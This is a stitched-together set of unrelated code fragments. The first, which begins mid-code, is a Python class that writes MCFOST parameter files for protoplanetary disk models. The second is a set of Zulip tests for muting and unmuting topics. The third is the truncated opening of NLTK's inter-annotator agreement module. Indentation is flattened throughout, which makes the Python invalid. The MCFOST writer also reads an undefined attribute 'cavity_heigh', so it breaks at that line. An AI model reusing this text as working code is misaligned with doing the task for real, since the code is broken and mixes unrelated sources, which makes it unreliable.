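    par.zone1_scale_height, par.zone1_ref_radius = 10.0, 100.0
    par.zone1_rin, par.zone1_rout = 1.0, 300.0
    par.zone1_flaring_exp, par.zone1_surf_density_exp = 1.125, -0.5
    par.writeFile()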
class Paramfile:
""" Object class interface to MCFOST parameter files
Example:
        par = Paramfile('somefile.par')
"""
_minimum_version = 2.15 # minimum MCFOST version for this code to run
def __init__(self, path):
""" Set initial parameter values.
THESE ARE JUST DEFINITIONS, NO NEED TO CHANGE THIS PART UNLESS A VERY
SPECIFIC PARAMETER MUST BE CHANGED
"""
self.path = path # path to save the file to
self.version = '2.19' # MCFOST version.
# Number of photon packages
self.nbr_photons_eq_th = np.nan # T computation
self.nbr_photons_lambda = np.nan # SED computation
self.nbr_photons_image = np.nan # image computation
# Wavelength
self.n_lambda = np.nan # micron
self.lambda_min = np.nan # micron
self.lambda_max = np.nan # micron
self.use_default_wavelength_grid = 'T'
self.compute_teff = 'T'
self.compute_sed = 'T'
self.wavelength_file = 'chose_it.lambda' # wavelength file (if previous parameter is F)
self.separate_contributions = 'F' # Separate contributions
self.compute_stokes = 'F'
# Grid geometry and size
self.grid_geometry = np.nan # 1 = cylindrical, 2 = spherical, 3 = Voronoi tesselation (this is in beta, please ask Christophe)
self.grid_n_rad = np.nan # n_rad (log distribution)
self.grid_nz = np.nan # nz (or n_theta)
self.grid_n_az = np.nan # n_az
self.grid_n_rad_in = np.nan # n_rad_in
#Maps
self.map_grid_nx = np.nan
self.map_grid_ny = np.nan
self.map_grid_size = np.nan # AU
self.mc = np.nan # N bins inclination for the MC phase
self.mc_n_bin_incl = 1
self.mc_n_bin_az = 1 # This parameter is not used by the user
self.rt_imin = 45.
self.rt_imax = 45.
self.rt_n_incl = 1.
self.rt_is_centered = 'F'
self.distance = np.nan # distance (pc)
self.pa = 0. # disk PA
# Scattering method
self.scattering_method = 0 # 0=auto, 1=grain prop, 2=cell prop
self.scattering_theory = 1 # 1=Mie, 2=hg (2 implies the loss of polarizarion)
        # Symmetries
self.image_symmetry = 'T' # image symmetry
self.central_symmetry = 'T' # central symmetry
self.axial_symmetry = 'T' # axial symmetry (important only if N_phi > 1)
# Disk physics
self.dust_settling = 0
self.dust_exp_strat = 0.50
self.dust_a_strat = 1.
self.dust_radial_migration = 'F' # dust radial migration
self.dust_sublimate_dust = 'F' # sublimate dust
        self.dust_hydrostatic_eq = 'F' # hydrostatic equilibrium
self.dust_viscous_heating = 'F' # viscous heating
self.dust_alpha_viscosity = 0.2
# Number of zones : 1 zone = 1 density structure + corresponding grain properties
self.n_zones = 1 # number of zones
# ZONES
#### We will define here 3 zones just in case, and use them only if n_zones is > 1
# Zone1
self.zone1_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone1_dust_mass = np.nan # dust mass
self.zone1_gas_to_dust_mass_ratio = 100.
self.zone1_scale_height = np.nan # scale height
self.zone1_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone1_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone1_rin = np.nan
self.zone1_edge = 0.0
self.zone1_rout = np.nan
self.zone1_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone1_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone1_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone1_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Zone2
self.zone2_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone2_dust_mass = np.nan # dust mass
self.zone2_gas_to_dust_mass_ratio = 100.
self.zone2_scale_height = np.nan # scale height
self.zone2_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone2_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone2_rin = np.nan
self.zone2_edge = 0.0
self.zone2_rout = np.nan
self.zone2_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone2_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone2_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone2_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Zone3
self.zone3_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone3_dust_mass = np.nan # dust mass
self.zone3_gas_to_dust_mass_ratio = 100.
self.zone3_scale_height = np.nan # scale height
self.zone3_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone3_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone3_rin = np.nan
self.zone3_edge = 0.0
self.zone3_rout = np.nan
self.zone3_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone3_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone3_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone3_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Cavity : everything is empty above the surface
self.is_cavity = 'F' # cavity
        self.cavity_height = 15. # height
self.cavity_ref_radius = 50. # reference radius (AU)
self.cavity_flaring = 1.5 # flaring exponent
# GRAINS
### Grain properties suffer from the same "problem" that disk zones, so will put three.
# Grain 1
self.grain1_n_species = 1 # Number of species
self.grain1_type = 'Mie' # Grain type (Mie or DHS)
self.grain1_n_components = 1
self.grain1_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain1_porosity = 0.0
self.grain1_mass_fract = 1.0
self.grain1_vmax = 0.9 # Vmax (for DHS)
self.grain1_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain1_dust_volume = 1.0 # Volume fraction
self.grain1_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain1_amin = 0.03 # amin (um)
self.grain1_amax = 1000.0 # amax (um)
self.grain1_aexp = 3.5 # aexp
self.grain1_n_grains = 50 # n_grains (log distrib)
        # Grain 2
self.grain2_n_species = 1 # Number of species
self.grain2_type = 'Mie' # Grain type (Mie or DHS)
self.grain2_n_components = 1
self.grain2_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain2_porosity = 0.0
self.grain2_mass_fract = 1.0
self.grain2_vmax = 0.9 # Vmax (for DHS)
self.grain2_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain2_dust_volume = 1.0 # Volume fraction
self.grain2_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain2_amin = 0.03 # amin (um)
self.grain2_amax = 1000.0 # amax (um)
self.grain2_aexp = 3.5 # aexp
self.grain2_n_grains = 50 # n_grains (log distrib)
        # Grain 3
self.grain3_n_species = 1 # Number of species
self.grain3_type = 'Mie' # Grain type (Mie or DHS)
self.grain3_n_components = 1
self.grain3_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain3_porosity = 0.0
self.grain3_mass_fract = 1.0
self.grain3_vmax = 0.9 # Vmax (for DHS)
self.grain3_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain3_dust_volume = 1.0 # Volume fraction
self.grain3_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain3_amin = 0.03 # amin (um)
self.grain3_amax = 1000.0 # amax (um)
self.grain3_aexp = 3.5 # aexp
self.grain3_n_grains = 50 # n_grains (log distrib)
### I WILL NOT DO ANY MOLECULAR STUFF. INSTEAD, I WILL COPY THE PARAGRAPHS EXACTLY AS IN THE ORIGINAL FILE. NO USE ANYWAY
#Star properties
self.n_stars = 1 # Number of stars
# star 1
self.star1_teff = np.nan
self.star1_radius = np.nan
self.star1_mass = np.nan
self.star1_x = 0. # AU
self.star1_y = 0. # AU
self.star1_z = 0. # AU
self.star1_blackbody = 'F'
self.star1_spectrum = np.nan
self.star1_fUV = 0.
self.star1_slopefUV = 2.2
# star 2
self.star2_teff = np.nan
self.star2_radius = np.nan
self.star2_mass = np.nan
self.star2_x = 0. # AU
self.star2_y = 0. # AU
self.star2_z = 0. # AU
self.star2_blackbody = 'F'
self.star2_spectrum = np.nan
self.star2_fUV = 0.
self.star2_slopefUV = 2.2
# star 3
self.star3_teff = np.nan
self.star3_radius = np.nan
self.star3_mass = np.nan
self.star3_x = 0. # AU
self.star3_y = 0. # AU
self.star3_z = 0. # AU
self.star3_blackbody = 'F'
self.star3_spectrum = np.nan
self.star3_fUV = 0.
self.star3_slopefUV = 2.2
def writeFile(self):
""" Write an MCFOST file.
It assumes I am clever enough to get all the variable definitions right... """
mcfost_file = open(self.path,'w')
# version
mcfost_file.write(str(self.version) +' mcfost version \n')
mcfost_file.write('\n')
# Number of photon packages
mcfost_file.write('#Number of photon packages\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_eq_th))+' nbr_photons_eq_th : T computation\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_lambda))+' nbr_photons_lambda : SED computation\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_image))+' nbr_photons_image : images computation\n')
mcfost_file.write('\n')
# Wavelength
mcfost_file.write('#Wavelength\n')
        values = ' {:} '.format(int(self.n_lambda)) + '{:.2e} '.format(float(self.lambda_min)) + '{:.2e} '.format(float(self.lambda_max))
mcfost_file.write(values + ' n_lambda, lambda_min, lambda_max [mum]\n')
        values = ' ' + self.compute_teff + ' ' + self.compute_sed + ' ' + self.use_default_wavelength_grid
mcfost_file.write(values + ' compute temperature?, compute sed?, use default wavelength grid ?\n')
mcfost_file.write(' ' + self.wavelength_file + ' wavelength file (if previous parameter is F)\n')
values = ' ' + self.separate_contributions + ' ' +self.compute_stokes
mcfost_file.write(' ' + values + ' separation of different contributions?, stokes parameters?\n')
mcfost_file.write('\n')
# Grid geometry and size
mcfost_file.write('#Grid geometry and size\n')
mcfost_file.write(' {:} '.format(int(self.grid_geometry)) + \
' 1 = cylindrical, 2 = spherical, 3 = Voronoi tesselation (this is in beta, please ask Christophe)\n')
values = ' {:} '.format(int(self.grid_n_rad)) + '{:} '.format(int(self.grid_nz)) +\
'{:} '.format(int(self.grid_n_az)) + '{:} '.format(int(self.grid_n_rad_in))
mcfost_file.write(values + ' n_rad (log distribution), nz (or n_theta), n_az, n_rad_in\n')
mcfost_file.write('\n')
# Maps
mcfost_file.write('#Maps\n')
        values = ' {:} '.format(int(self.map_grid_nx)) + '{:} '.format(int(self.map_grid_ny)) + '{:.3} '.format(float(self.map_grid_size))
mcfost_file.write(values + ' grid (nx,ny), size [AU]\n')
values = ' {:} '.format(int(self.mc)) + '{:} '.format(int(self.mc_n_bin_incl)) + '{:} '.format(int(self.mc_n_bin_az))
mcfost_file.write(values + ' MC : N_bin_incl, N_bin_az\n')
values = ' {:.3} '.format(float(self.rt_imin)) + '{:.3} '.format(float(self.rt_imax)) +\
'{:} '.format(int(self.rt_n_incl)) + ' ' + self.rt_is_centered
mcfost_file.write(values + ' RT: imin, imax, n_incl, centered ?\n')
mcfost_file.write(' {:.3} '.format(float(self.distance)) + ' distance (pc)\n')
mcfost_file.write(' {:.3} '.format(float(self.pa)) + ' disk PA\n')
mcfost_file.write('\n')
# Scattering method
mcfost_file.write('#Scattering method\n')
mcfost_file.write(' {:} '.format(int(self.scattering_method)) + ' 0=auto, 1=grain prop, 2=cell prop\n')
mcfost_file.write(' {:} '.format(int(self.scattering_theory)) + ' 1=Mie, 2=hg (2 implies the loss of polarizarion)\n')
mcfost_file.write('\n')
# Symmetries
mcfost_file.write('#Symmetries\n')
mcfost_file.write(' ' + self.image_symmetry + ' image symmetry\n')
mcfost_file.write(' ' + self.central_symmetry + ' central symmetry\n')
mcfost_file.write(' ' + self.axial_symmetry + ' axial symmetry (important only if N_phi > 1)\n')
mcfost_file.write('\n')
# Disk physics
mcfost_file.write('#Disk physics\n')
values = ' {:} '.format(int(self.dust_settling)) + '{:.3} '.format(float(self.dust_exp_strat)) + '{:.3} '.format(float(self.dust_a_strat))
mcfost_file.write(values + ' dust_settling (0=no settling, 1=parametric, 2=Dubrulle, 3=Fromang), exp_strat, a_strat (for parametric settling)\n')
mcfost_file.write(' ' + self.dust_radial_migration + ' dust radial migration\n')
mcfost_file.write(' ' + self.dust_sublimate_dust + ' sublimate\n')
        mcfost_file.write(' ' + self.dust_hydrostatic_eq + ' hydrostatic equilibrium\n')
        mcfost_file.write(' ' + self.dust_viscous_heating + ' '+'{:.1e}'.format(float(self.dust_alpha_viscosity)) + ' viscous heating, alpha_viscosity\n')
mcfost_file.write('\n')
# Number of zones
mcfost_file.write('#Number of zones : 1 zone = 1 density structure + corresponding grain properties\n')
mcfost_file.write(' {:} '.format(int(self.n_zones))+'\n')
mcfost_file.write('\n')
# Density structure
mcfost_file.write('#Density structure\n')
        ## Zone 1, which exists for sure
mcfost_file.write(' {:} '.format(int(self.zone1_type)) + ' zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone1_dust_mass)) + '{:.3} '.format(float(self.zone1_gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone1_scale_height)) + '{:.3} '.format(float(self.zone1_ref_radius)) +\
'{:.3} '.format(float(self.zone1_vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone1_rin)) + '{:.3} '.format(float(self.zone1_edge)) +\
'{:.3} '.format(float(self.zone1_rout))+ '{:.3} '.format(float(self.zone1_rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tappered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone1_flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone1_surf_density_exp)) + '{:.3} '.format(float(self.zone1_minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tappered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
## Zone 2 if needed
if self.n_zones > 1:
mcfost_file.write(' {:} '.format(int(self.zone2_type)) + ' zone type : 1 = disk, 2 = tappered-edge disk,'+\
' 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone2_dust_mass)) + '{:.3} '.format(float(self.zone2_gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone2_scale_height)) + '{:.3} '.format(float(self.zone2_ref_radius)) +\
'{:.3} '.format(float(self.zone2_vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone2_rin)) + '{:.3} '.format(float(self.zone2_edge)) +\
'{:.3} '.format(float(self.zone2_rout))+ '{:.3} '.format(float(self.zone2_rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tappered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone2_flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone2_surf_density_exp)) + '{:.3} '.format(float(self.zone2_minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tapered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
## Zone 3 if needed
if self.n_zones > 2:
mcfost_file.write(' {:} '.format(int(self.zone3_type)) + ' zone type : 1 = disk, 2 = tapered-edge disk,'+\
' 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone3_dust_mass)) + '{:.3} '.format(float(self.zone3_gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone3_scale_height)) + '{:.3} '.format(float(self.zone3_ref_radius)) +\
'{:.3} '.format(float(self.zone3_vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone3_rin)) + '{:.3} '.format(float(self.zone3_edge)) +\
'{:.3} '.format(float(self.zone3_rout))+ '{:.3} '.format(float(self.zone3_rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tapered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone3_flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone3_surf_density_exp)) + '{:.3} '.format(float(self.zone3_minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tapered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
mcfost_file.write('\n')
# Cavity
mcfost_file.write('#Cavity : everything is empty above the surface\n')
mcfost_file.write(' ' + self.is_cavity + ' cavity ?\n')
values = ' {:.3} '.format(float(self.cavity_heigh)) + '{:.3} '.format(float(self.cavity_ref_radius))
mcfost_file.write(values + ' height, reference radius (AU)\n')
mcfost_file.write(' {:.3} '.format(float(self.cavity_flaring))+ ' flaring exponent\n')
mcfost_file.write('\n')
# Grains
mcfost_file.write('#Grain properties\n')
## Grain 1, which always exists
mcfost_file.write(' {:} '.format(int(self.grain1_n_species))+ ' Number of species\n')
values = ' ' + self.grain1_type + ' {:} '.format(int(self.grain1_n_components)) + '{:} '.format(int(self.grain1_mixing_rule)) +\
'{:.3} '.format(float(self.grain1_porosity)) + '{:.3} '.format(float(self.grain1_mass_fract))+ '{:.3} '.format(float(self.grain1_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain1_dust_file + ' {:.3} '.format(float(self.grain1_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain1_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain1_amin)) + '{:.3} '.format(float(self.grain1_amax)) +\
'{:.3} '.format(float(self.grain1_aexp)) + '{:} '.format(int(self.grain1_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
## Grain 2 if needed
if self.n_zones > 1:
mcfost_file.write(' {:} '.format(int(self.grain2_n_species))+ ' Number of species\n')
values = ' ' + self.grain2_type + ' {:} '.format(int(self.grain2_n_components)) + '{:} '.format(int(self.grain2_mixing_rule)) +\
'{:.3} '.format(float(self.grain2_porosity)) + '{:.3} '.format(float(self.grain2_mass_fract))+ '{:.3} '.format(float(self.grain2_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain2_dust_file + ' {:.3} '.format(float(self.grain2_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain2_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain2_amin)) + '{:.3} '.format(float(self.grain2_amax)) +\
'{:.3} '.format(float(self.grain2_aexp)) + '{:} '.format(int(self.grain2_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
## Grain 3 if needed
if self.n_zones > 2:
mcfost_file.write(' {:} '.format(int(self.grain3_n_species))+ ' Number of species\n')
values = ' ' + self.grain3_type + ' {:} '.format(int(self.grain3_n_components)) + '{:} '.format(int(self.grain3_mixing_rule)) +\
'{:.3} '.format(float(self.grain3_porosity)) + '{:.3} '.format(float(self.grain3_mass_fract))+ '{:.3} '.format(float(self.grain3_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain3_dust_file + ' {:.3} '.format(float(self.grain3_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain3_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain3_amin)) + '{:.3} '.format(float(self.grain3_amax)) +\
'{:.3} '.format(float(self.grain3_aexp)) + '{:} '.format(int(self.grain3_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
mcfost_file.write('\n')
# Molecular RT settings (hard-coded defaults, not taken from the parameter object)
mcfost_file.write('#Molecular RT settings\n'+\
' T T T 15. lpop, laccurate_pop, LTE, profile width (km.s^-1)\n'+\
' 0.2 v_turb (delta)\n'+\
' 1 nmol\n'+\
' co@xpol.dat 6 molecular data filename, level_max\n'+\
' 1.0 20 vmax (km.s^-1), n_speed\n'+\
' T 1.e-6 abundance.fits.gz cst molecule abundance ?, abundance, abundance file\n'+\
' T 3 ray tracing ?, number of lines in ray-tracing\n'+\
' 1 2 3 transition numbers\n')
mcfost_file.write('\n')
# Star properties
mcfost_file.write('#Star properties\n')
## Star 1, always present
mcfost_file.write(' {:} '.format(int(self.n_stars)) +' Number of stars\n')
values = ' {:.3} '.format(float(self.star1_teff)) + '{:.3} '.format(float(self.star1_radius)) + '{:.3} '.format(float(self.star1_mass)) +\
' {:.3} '.format(float(self.star1_x)) + '{:.3} '.format(float(self.star1_y)) + '{:.3} '.format(float(self.star1_z)) + ' '+ self.star1_blackbody
mcfost_file.write(values + ' Temp, radius (solar radius), M (solar mass), x, y, z (AU), is a blackbody?\n')
mcfost_file.write(' ' + self.star1_spectrum +'\n')
values = ' {:.3} '.format(float(self.star1_fUV)) + '{:.3} '.format(float(self.star1_slopefUV))
mcfost_file.write(values + ' fUV, slope_fUV\n')
mcfost_file.close()
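# The zone blocks above are written with near-identical copy-pasted code per
# zone. A minimal sketch of a loop-based alternative (illustrative only; it
# assumes the per-zone parameters are collected into dicts instead of the
# zoneN_* attributes used above):
def write_zone_block(mcfost_file, zone):
    """Write one MCFOST density-structure block from a parameter dict."""
    mcfost_file.write(' {:} '.format(int(zone['type'])) +
                      ' zone type : 1 = disk, 2 = tapered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall\n')
    values = ' {:.3e} '.format(float(zone['dust_mass'])) + '{:.3} '.format(float(zone['gas_to_dust_mass_ratio']))
    mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
    # ...the remaining lines follow the same pattern as the zone 1 block above,
    # so supporting another zone becomes appending one dict instead of a code block.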
|
|
from datetime import datetime, timedelta, timezone
from typing import Any, Dict
from unittest import mock
from django.utils.timezone import now as timezone_now
from zerver.lib.stream_topic import StreamTopicTarget
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.topic_mutes import (
add_topic_mute,
get_topic_mutes,
remove_topic_mute,
topic_is_muted,
)
from zerver.models import UserProfile, UserTopic, get_stream
class MutedTopicsTests(ZulipTestCase):
def test_get_deactivated_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
recipient = stream.recipient
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
stream.deactivated = True
stream.save()
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user, True))
def test_user_ids_muting_topic(self) -> None:
hamlet = self.example_user("hamlet")
cordelia = self.example_user("cordelia")
realm = hamlet.realm
stream = get_stream("Verona", realm)
recipient = stream.recipient
topic_name = "teST topic"
stream_topic_target = StreamTopicTarget(
stream_id=stream.id,
topic_name=topic_name,
)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, set())
def mute_topic_for_user(user: UserProfile) -> None:
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="test TOPIC",
date_muted=timezone_now(),
)
mute_topic_for_user(hamlet)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id})
hamlet_date_muted = UserTopic.objects.filter(user_profile=hamlet)[0].date_muted
self.assertTrue(timezone_now() - hamlet_date_muted <= timedelta(seconds=100))
mute_topic_for_user(cordelia)
user_ids = stream_topic_target.user_ids_muting_topic()
self.assertEqual(user_ids, {hamlet.id, cordelia.id})
cordelia_date_muted = UserTopic.objects.filter(user_profile=cordelia)[0].date_muted
self.assertTrue(timezone_now() - cordelia_date_muted <= timedelta(seconds=100))
def test_add_muted_topic(self) -> None:
user = self.example_user("hamlet")
self.login_user(user)
stream = get_stream("Verona", user.realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "Verona3", "op": "add"},
{"stream_id": stream.id, "topic": "Verona3", "op": "add"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
for data in payloads:
with mock.patch(
"zerver.views.muting.timezone_now",
return_value=datetime(2020, 1, 1, tzinfo=timezone.utc),
):
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertTrue(topic_is_muted(user, stream.id, "Verona3"))
self.assertTrue(topic_is_muted(user, stream.id, "verona3"))
remove_topic_mute(
user_profile=user,
stream_id=stream.id,
topic_name="Verona3",
)
def test_remove_muted_topic(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
url = "/api/v1/users/me/subscriptions/muted_topics"
payloads = [
{"stream": stream.name, "topic": "vERONA3", "op": "remove"},
{"stream_id": stream.id, "topic": "vEroNA3", "op": "remove"},
]
mock_date_muted = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
assert recipient is not None
for data in payloads:
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=datetime(2020, 1, 1, tzinfo=timezone.utc),
)
self.assertIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
result = self.api_patch(user, url, data)
self.assert_json_success(result)
self.assertNotIn((stream.name, "Verona3", mock_date_muted), get_topic_mutes(user))
self.assertFalse(topic_is_muted(user, stream.id, "verona3"))
def test_muted_topic_add_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
recipient = stream.recipient
assert recipient is not None
add_topic_mute(
user_profile=user,
stream_id=stream.id,
recipient_id=recipient.id,
topic_name="Verona3",
date_muted=timezone_now(),
)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": stream.name, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic already muted")
data = {"stream_id": 999999999, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Invalid stream id")
data = {"topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "add"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
def test_muted_topic_remove_invalid(self) -> None:
user = self.example_user("hamlet")
realm = user.realm
self.login_user(user)
stream = get_stream("Verona", realm)
url = "/api/v1/users/me/subscriptions/muted_topics"
data: Dict[str, Any] = {"stream": "BOGUS", "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream": stream.name, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"stream_id": 999999999, "topic": "BOGUS", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Topic is not muted")
data = {"topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please supply 'stream'.")
data = {"stream": stream.name, "stream_id": stream.id, "topic": "Verona3", "op": "remove"}
result = self.api_patch(user, url, data)
self.assert_json_error(result, "Please choose one: 'stream' or 'stream_id'.")
|
|
# Natural Language Toolkit: Agreement Metrics
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Tom Lippincott <tom@cs.columbia.edu>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Implementations of inter-annotator agreement coefficients surveyed by Artstein
and Poesio (2007), Inter-Coder Agreement for Computational Linguistics.
An agreement coefficient calculates the amount that annotators agreed on label
assignments beyond what is expected by chance.
In defining the AnnotationTask class, we use naming conventions similar to the
paper's terminology. There are three types of objects in an annotation task:
the coders (variables "c" and "C")
the items to be annotated (variables "i" and "I")
the potential categories to be assigned (variables "k" and "K")
Additionally, it is often the case that we don't want to treat two different
labels as complete disagreement, and so the AnnotationTask constructor can also
take a distance metric as a final argument. Distance metrics are simply
functions that take two arguments, and return a value between 0.0 and 1.0
indicating the distance between them. If not supplied, the default is binary
